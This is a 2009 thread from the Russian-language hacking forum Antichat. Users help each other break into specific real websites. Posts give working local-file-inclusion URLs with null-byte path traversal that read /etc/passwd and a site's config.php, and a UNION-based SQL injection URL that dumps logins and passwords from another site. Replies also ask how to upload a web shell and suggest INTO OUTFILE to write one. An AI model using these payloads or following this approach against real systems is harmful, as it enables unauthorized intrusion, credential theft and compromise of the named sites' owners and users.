ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

17.06.2009, 21:19
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
1. Нет прав на чтение
2. Даже на /etc/passwd бывает фейки суют
|
|
|

17.06.2009, 21:25
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме: 190310
Репутация:
7
|
|
http://www.imaf.co.uk/content.php?page=../../../../../../../../../../../../../../etc/passwd%00
Почему решили что фейк? И лог тоже фейковый?
|
|
|

17.06.2009, 21:29
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Реально видел, правда один раз, сам админ написал при ../etc/passwd - "это фейк  ", скорее всего нет прав на чтение
и потом, logs/error_log вовсе не означает, что это тут:
/etc/httpd/logs/error_log
Последний раз редактировалось Pashkela; 17.06.2009 в 21:34..
|
|
|

17.06.2009, 21:35
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме: 190310
Репутация:
7
|
|
Тогда относительно чего же этот путь
logs/error_log
|
|
|

17.06.2009, 22:34
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме: 2805813
Репутация:
1396
|
|
http://www.imaf.co.uk/content.php?page=../../../../../../../../../../../../../../home/web/imaf/imaf-forum/config.php%00
все там норм, никакого фейка..логи ищи. Поиск тебе в руки, была тема еttee.
|
|
|

18.06.2009, 01:01
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме: 190310
Репутация:
7
|
|
Логов по стандартным путям из темы http://forum.antichat.ru/thread49775.html не нашлось
|
|
|

18.06.2009, 12:09
|
|
Banned
Регистрация: 16.06.2009
Сообщений: 5
Провел на форуме: 30688
Репутация:
-51
|
|
Можно ли залить shell сюда?
http://egechita.ru/documents/show_doc.php?doc=68&type=federalsfhjdgj
2 вопрос
/home/www/egechita/documents/show_doc.php
вот структура сайта.
Что я могу ещё полезного вытащить кроме етк/пасс?
сервер *nix
Последний раз редактировалось Скорпиончик; 18.06.2009 в 12:15..
|
|
|

18.06.2009, 12:36
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме: 3020589
Репутация:
240
|
|
Скорпиончик
Вот там еще нашел http://egechita.ru/news/show_news.php?id_news=56+union+select+1,concat_ws( 0x3a,login,pass),3,4,5+from+user+limit+1,1/*
пятая ветка
|
|
|

18.06.2009, 12:51
|
|
Banned
Регистрация: 16.06.2009
Сообщений: 5
Провел на форуме: 30688
Репутация:
-51
|
|
я это находил. эти нечего не дают пассы. надо шелл залить
|
|
|

18.06.2009, 13:18
|
|
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
Провел на форуме: 1608606
Репутация:
105
|
|
попробуй INTO OUTFILE и ищи папку с правами на запись
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|